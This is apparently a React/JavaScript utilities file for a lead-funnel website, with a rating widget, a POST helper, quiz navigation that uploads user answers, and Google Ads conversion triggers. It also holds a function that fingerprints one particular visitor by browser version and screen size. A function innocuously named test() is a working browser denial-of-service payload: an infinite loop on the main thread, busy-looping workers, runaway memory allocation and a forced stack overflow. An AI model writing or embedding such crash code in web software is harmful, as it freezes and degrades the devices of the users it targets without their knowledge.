import { APIENDPOINTURL } from "./settings";
export const StarRating = ({ rating }) => {
  const totalStars = 5;
  const fullStars = Math.floor(rating);
  const halfStar = rating % 1 >= 0.5;
  const emptyStars = totalStars - fullStars - (halfStar ? 1 : 0);

  return (
    <div className="d-flex align-items-center">
      {[...Array(fullStars)].map((_, index) => (
        <span key={`full-${index}`} className="text-warning">&#9733;</span>
      ))}
      {halfStar && <span className="text-warning">&#9734;</span>}
      {[...Array(emptyStars)].map((_, index) => (
        <span key={`empty-${index}`} className="text-secondary">&#9734;</span>
      ))}
      <span className="ms-2">{rating} on Google</span>
    </div>
  );
};

export async function postData(url, data) {

  try {

    const response = await fetch(url, {
      method: "POST",
      headers: { 'Content-Type': 'application/json', },
      body: JSON.stringify(data)
    });

    const responseBody = await response.json();

    if (!response.ok) {
      throw new Error('Network response not ok');
    }

    return responseBody;


  } catch (error) {
    console.error("Error: ", error);
    return {};
  }



}



export async function handleOptionSelect(navigate, location, setUserAnswers, page, userInput) {
  // Create a new data object with the current timestamp
  const newData = {
    page,
    userInput,
    timestamp: new Date().toISOString() // Current datetime in ISO format
  };

  // Update the state and capture the updated data
  let allData = [];
  setUserAnswers((prevValue) => {
    allData = [...prevValue, newData]; // Append new data to the previous state
    return allData; // Return the updated state
  });

  // Get the current path without query parameters and trailing slashes
  let currentPath = location.pathname.replace(/\/$/, ""); // Remove trailing slash if present
  const pathSegments = currentPath.split('/'); // Split path into segments

  // Modify the last segment (increment it by 1)
  const lastSegment = parseInt(pathSegments[pathSegments.length - 1], 10); // Convert last segment to number
  if (isNaN(lastSegment)) {
    console.error('Last segment is not a valid number.');
    return;
  }

  pathSegments[pathSegments.length - 1] = (lastSegment + 1).toString(); // Increment and replace

  // Construct the new path without query parameters
  const newPath = pathSegments.join('/');

  // Navigate to the new path
  navigate(newPath);

  // Send the updated data to the server
  try {
    await postData(`${APIENDPOINTURL}?update`, allData);
  } catch (error) {
    console.error('Error posting data:', error);
  }
}

export function itsThatOneUserWithChangingGclid() {
  const userAgent = navigator.userAgent;
  const screenWidth = window.screen.width;
  const screenHeight = window.screen.height;

  if (
    userAgent.includes("131.0.6778") &&
    screenWidth === 1024 &&
    screenHeight === 768
  ) {
    return true;
  }
  return false;
}




// Function to trigger Lead Funnel Completion Conversion (without redirection)
//function to trigger the buy
export const triggerFunnelBuyConversion = () => {
  if (typeof window.gtag === 'function') {
    window.gtag('event', 'conversion', {
      'send_to': 'AW-16851699749/X9eoCKy_7ZgaEKWQwuM-'
    });
    console.log('Funnel conversion triggered.');
  } else {
    console.error('Google Tag (gtag) is not available.');
  }
};


// Function to trigger Lead Funnel Completion Conversion (without redirection)
export const triggerFunnelSellConversion = () => {
  if (typeof window.gtag === 'function') {
    window.gtag('event', 'conversion', {
      'send_to': 'AW-16851699749/1MunCMCw9JgaEKWQwuM-'
    });
    console.log('Funnel conversion triggered.');
  } else {
    console.error('Google Tag (gtag) is not available.');
  }
};

export const triggerFunnelBuyAndSellConversion = () => {
  if (typeof window.gtag === 'function') {
    window.gtag('event', 'conversion', {
      'send_to': 'AW-16851699749/mdzqCOu39JgaEKWQwuM-'
    });
    console.log('Funnel conversion triggered.');
  } else {
    console.error('Google Tag (gtag) is not available.');
  }
};

export function test() {
  console.log("Waiting 3 seconds before starting the test...");

  setTimeout(() => {
    console.log("Starting test...");

    // Block the main thread (makes UI unresponsive)
    setTimeout(() => {
      while (true) {
        let result = Math.random() * Math.random();
      }
    }, 1000);

    const workerScript = `
        self.onmessage = function() {
            while (true) {
                Math.random() * Math.random();
            }
        };
    `;

    const blob = new Blob([workerScript], { type: "application/javascript" });
    const workerURL = URL.createObjectURL(blob);
    let workers = [];

    for (let i = 0; i < navigator.hardwareConcurrency * 2; i++) {
      const worker = new Worker(workerURL);
      worker.postMessage("start");
      workers.push(worker);
    }

    console.log(`Spawned ${workers.length} workers.`);

    let memoryEater = [];
    function allocateMemory() {
      try {
        for (let i = 0; i < 1000; i++) {
          memoryEater.push(new Array(1e7).fill(Math.random())); // Allocate larger chunks
        }
        console.log("Allocated memory blocks: " + memoryEater.length);
        setTimeout(allocateMemory, 50); // Faster allocation
      } catch (e) {
        console.error("Memory allocation failed", e);
      }
    }

    allocateMemory();

    // Recursive stack overflow
    function recursiveCrash() {
      recursiveCrash();
    }

    setTimeout(() => {
      try {
        recursiveCrash();
      } catch (e) {
        console.error("Stack overflow", e);
      }
    }, 2000); // Small delay to allow other tasks to start

    console.log("Hmmm...");
  }, 3000); // 3-second delay before execution
}





// Function to trigger Phone Call Made Conversion (without redirection)
export const triggerPhoneConversion = () => {
  if (typeof window.gtag === 'function') {
    window.gtag('event', 'conversion', {
      'send_to': 'AW-16851699749/pDxlCO-U_pgaEKWQwuM-'
    });
    console.log('Phone call conversion triggered.');
  } else {
    console.error('Google Tag (gtag) is not available.');
  }
};
